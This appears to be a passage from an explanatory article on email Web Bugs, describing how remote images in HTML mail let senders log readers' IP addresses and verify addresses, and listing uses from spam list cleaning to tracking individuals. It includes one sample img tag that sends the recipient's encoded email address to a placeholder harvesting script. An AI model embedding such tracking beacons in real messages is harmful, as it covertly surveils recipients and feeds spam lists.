What Are the Implications?
Well, the most disconcerting is that that your location, more or less, is harvested by simply opening the email. Most Web servers can be set to save log files that will include your IP address, the file you accessed, and the time you accessed it. Although Web Bugs might not be the most accurate method of tracking someone down, it's enough to let them know that you're reading your email at a Kinko's terminal in Raleigh, North Carolina.
There are more insidious ways that HTML can be manipulated to gather addresses. HTML tags can be used to request remote documents. Tags that generally automatically retrieve remote images or documents include img, frame, link, and the background= attribute used with body and table. When encoding the URL such as the following, the spam sender can not only gather passive intelligence such as your email reading habits, IP address, operating system, and browser, but actually verifies your email address:
<img src="http://somewhere.foo.bar/harvest.pl?emailid%3Daddress%40example.com">
Although this method is probably impractical for verifying tens of thousands of individual addresses, it is useful for several things:
It identifies percentages of people using HTML-compliant mail readers.
It identifies a general level of "completeness" of a bulk emailer's mailing list. For example, if 2,000,000 emails are sent out, and the .jpeg file is downloaded 1,000,000 times, the spamvertiser can assume that about half the addresses on the list are bad.
It can track down a single individual. Such an email sent to only one person and opened by that person results in a log entry revealing the IP address that the recipient was reading mail from. Maybe not the best way to locate deadbeat dads, but probably good enough to tell if Osama Bin Laden is reading his email from a coffee shop in Milan.
It can identify who will open what type of message. A web Bug can be used nefariously inside a corporation to see who might read email that the company doesn't like. For example, a bogus message with the topic "On-line games you can play during office hours!" might contain a Web Bug that returns a list of all the employees who had opened it.
It can track who reads particular Usenet NEWS messages. Because programs such as Outlook and Netscape can post and read HTML mail messages to Usenet NEWS groups, it's possible to post a Web Bug as part of a NEWS message, and track who and how many people read that message. A typical example of this is law enforcement compiling a database of people who read a post about an illegal or suspicious activity; a message entitled "bomb recipes" for example.
It can track how email is forwarded. People who are interested in how viruses get from one place to another, or who wonder how virus hoaxes or jokes get forwarded from person to person can use a Web Bug to trace the path of an email message from user to user.
Innocuous info that is passively gathered can easily be used by black hats (criminal hackers, or crackers) to check and see whether you've applied all the Microsoft security patches.
A verifiable working email address can be sold to others looking to join the spam wagon.